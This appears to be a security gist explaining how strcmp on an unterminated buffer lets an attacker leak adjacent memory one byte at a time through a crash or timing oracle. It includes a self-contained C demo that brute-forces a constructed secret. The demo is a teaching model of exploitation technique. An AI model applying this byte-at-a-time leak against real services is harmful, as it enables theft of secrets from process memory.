Created
April 3, 2025 14:11
Gist: wh1t3h47/265377d8e5866120ceb74b936dda1c7c
C Hacking Note
strcmp: compare strings.
strcmp only reads its two arguments, so by itself it cannot cause a buffer-overflow write.
However, if the first argument is not NUL-terminated and the second is attacker controlled,
strcmp keeps reading past the end of the first buffer for as long as the attacker's bytes
match what is in memory, stopping only at the first mismatch or the first NUL. Given some
indicator of how far the comparison got (e.g. the process crashing and the service restarting
when the read runs into unmapped memory, versus answering normally), this turns into an
out-of-bounds read of the memory that follows the buffer.
It is a slow attack: the memory after the buffer has to be brute-forced one byte at a time
(at most 255 guesses per byte, since a NUL cannot be sent inside a C string), and the leak
stops at the first NUL byte in memory, because strcmp will not read past it. Timing is an
alternative oracle, since strcmp's run time grows with the length of the matching prefix,
but it needs repeated measurements and the right statistical analysis to separate the
signal from noise. The idea is borrowed from the stack-reading step of Bittau et al.'s
Blind ROP (BROP) work, which uses a crash/no-crash oracle to recover bytes one at a time.
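As an added illustration (not part of the original note), the C program below models the byte-at-a-time leak. The real timing or crash oracle is replaced by a strcmp clone that reports how many byte positions it examined, so the run is deterministic; the target layout (an 8-byte unterminated token immediately followed by a secret), the function names and the constants are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_LEAK 64

/* Constructed target: an 8-byte token with no NUL terminator, immediately
 * followed in memory by data the attacker wants. A service that runs
 * strcmp(state->token, attacker_string) reads straight through into secret. */
struct service_state {
    char token[8];     /* filled completely: no terminating NUL */
    char secret[16];   /* adjacent memory, leaked byte by byte */
};

/* strcmp clone that also reports how many byte positions it examined.
 * This stands in for the timing side channel: a real strcmp's run time
 * grows with the length of the matching prefix. */
static int counted_strcmp(const char *a, const char *b, size_t *steps)
{
    size_t i = 0;
    while (a[i] != '\0' && a[i] == b[i])
        i++;
    *steps = i + 1;  /* positions touched, including the one that stopped the loop */
    return (unsigned char)a[i] - (unsigned char)b[i];
}

/* The attacker's only view of the target: submit a string, observe "time".
 * The struct is addressed as one byte array so the read past token[] is a
 * read of the same object, as it would be in the target process. */
static size_t oracle(const struct service_state *s, const char *guess)
{
    size_t steps;
    counted_strcmp((const char *)s, guess, &steps);
    return steps;
}

/* Recover memory starting at strcmp's first argument, one byte at a time,
 * until a NUL byte in memory stops strcmp from reading any further.
 * Returns the number of bytes recovered; out[] is NUL-terminated. */
static size_t leak_memory(const struct service_state *s, char *out)
{
    char guess[MAX_LEAK + 2];   /* known prefix + candidate byte + NUL */
    size_t known = 0;

    while (known < MAX_LEAK) {
        int best = -1;
        size_t best_steps = 0;
        memcpy(guess, out, known);
        for (int c = 1; c < 256; c++) {   /* 0 cannot be sent: it ends the guess */
            guess[known] = (char)c;
            guess[known + 1] = '\0';
            size_t steps = oracle(s, guess);
            if (steps > best_steps) {
                best_steps = steps;
                best = c;
            }
        }
        /* A wrong byte costs known+1 compares, the right one known+2. If no
         * candidate reaches known+2, the byte in memory is NUL: strcmp stops
         * there and no guess can read beyond it. */
        if (best_steps < known + 2)
            break;
        out[known++] = (char)best;
    }
    out[known] = '\0';
    return known;
}

/* Build the constructed target and run the leak against it. */
const char *demo_leak(void)
{
    static char out[MAX_LEAK + 1];
    struct service_state s;
    memset(&s, 0, sizeof s);
    memcpy(s.token, "ABCDEFGH", 8);        /* 8 bytes, deliberately no NUL */
    memcpy(s.secret, "flag{leak}", 10);    /* followed by zero bytes */
    leak_memory(&s, out);
    return out;
}

int main(void)
{
    const char *leaked = demo_leak();
    printf("recovered %zu bytes: %s\n", strlen(leaked), leaked);
    return 0;
}
```

The leak recovers the token itself and then everything after it up to the first NUL, which is exactly the limit the note describes. Against a real service the step count would be a noisy response time or a crash/no-crash signal, so each candidate would need several measurements and a vote rather than a single comparison.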